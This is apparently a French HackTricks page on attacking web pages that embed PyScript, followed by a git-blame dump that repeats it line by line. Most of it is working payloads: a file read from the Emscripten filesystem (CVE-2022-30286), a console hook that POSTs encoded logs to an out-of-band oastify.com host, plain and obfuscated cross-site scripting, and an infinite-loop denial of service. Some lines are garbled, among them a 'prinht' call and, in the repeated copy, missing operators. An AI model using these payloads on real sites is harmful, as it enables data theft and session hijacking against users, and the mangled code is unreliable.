hacktricks/generic-methodologies-and-resources/python/pyscript.md

# Pyscript

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks:

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.

</details>

## Guide de test d'intrusion PyScript

PyScript est un nouveau framework développé pour intégrer Python dans HTML, afin de l'utiliser aux côtés de HTML. Dans cette fiche de triche, vous trouverez comment utiliser PyScript à des fins de test d'intrusion.

### Extraction / Récupération de fichiers du système de fichiers virtuel Emscripten :

`ID CVE : CVE-2022-30286`\
\
Code:
```html
<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
</py-script>
```
Résultat :

![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)

### [Exfiltration de données OOB du système de fichiers de mémoire virtuelle Emscripten (surveillance de la console)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)

`CVE ID: CVE-2022-30286`\
\
Code:
```html
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>
```
Résultat :

![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)

### Cross Site Scripting (Ordinaire)

Code :
```python
<py-script>
print("<img src=x onerror='alert(document.domain)'>")
</py-script>
```
Résultat :

![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)

### Cross Site Scripting (Python Obfusqué)

Code :
```python
<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"

print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>
```
Résultat :

![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)

### Cross Site Scripting (Obfuscation JavaScript)

Code:
```html
<py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script>
```
Résultat :

![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)

### Attaque par déni de service (boucle infinie)

Code :
```html
<py-script>
while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script>
```
Résultat :

![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.

</details>
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`# Pyscript`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00			`<details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Autres façons de soutenir HackTricks:`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop)!`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez-nous sur Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
			`</details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`## Guide de test d'intrusion PyScript`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`PyScript est un nouveau framework développé pour intégrer Python dans HTML, afin de l'utiliser aux côtés de HTML. Dans cette fiche de triche, vous trouverez comment utiliser PyScript à des fins de test d'intrusion.`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`### Extraction / Récupération de fichiers du système de fichiers virtuel Emscripten :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`ID CVE : CVE-2022-30286`\
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`\`
			`Code:`
			```html
			`<py-script>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:`
			`out = fin.read()`
			`print(out)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`</py-script>`
			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Résultat :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)`

Translated to French 2023-06-03 13:10:46 +00:00			`### [Exfiltration de données OOB du système de fichiers de mémoire virtuelle Emscripten (surveillance de la console)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`CVE ID: CVE-2022-30286`\
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`\`
			`Code:`
			```html
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<py-script>`
Update pyscript.md 2022-09-12 17:36:08 +00:00			`x = "CyberGuy"`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`if x == "CyberGuy":`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`with open('/lib/python3.10/asyncio/tasks.py') as output:`
			`contents = output.read()`
			`print(contents)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`</py-script>`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Résultat :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)`

Translated to French 2023-06-03 13:10:46 +00:00			`### Cross Site Scripting (Ordinaire)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Code :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```python
			`<py-script>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`print("<img src=x onerror='alert(document.domain)'>")`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			`</py-script>`
			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Résultat :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)`

Translated to French 2023-06-03 13:10:46 +00:00			`### Cross Site Scripting (Python Obfusqué)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Code :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```python
			`<py-script>`
			`sur = "\u0027al";fur = "e";rt = "rt"`
			`p = "\x22x$$\x22\x29\u0027\x3E"`
			`s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"`
			`e = "c\u003d";q = "x"`
			`y = "o";m = "ner";z = "ror\u003d"`

			`print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)`
			`</py-script>`
			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Résultat :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)`

Translated to French 2023-06-03 13:10:46 +00:00			`### Cross Site Scripting (Obfuscation JavaScript)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`Code:`
			```html
			`<py-script>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
			`</py-script>`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Résultat :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`### Attaque par déni de service (boucle infinie)`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Code :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```html
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<py-script>`
			`while True:`
			`print("                              ")`
			`</py-script>`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00			```
Translated to French 2023-06-03 13:10:46 +00:00			`Résultat :`
GitBook: [#3205] No subject 2022-05-16 08:29:00 +00:00
			`![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
			`<details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Autres façons de soutenir HackTricks :`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFT](https://opensea.io/collection/the-peass-family)`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez-nous sur Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.`
GitBook: [#3213] No subject 2022-05-18 11:02:19 +00:00
			`</details>`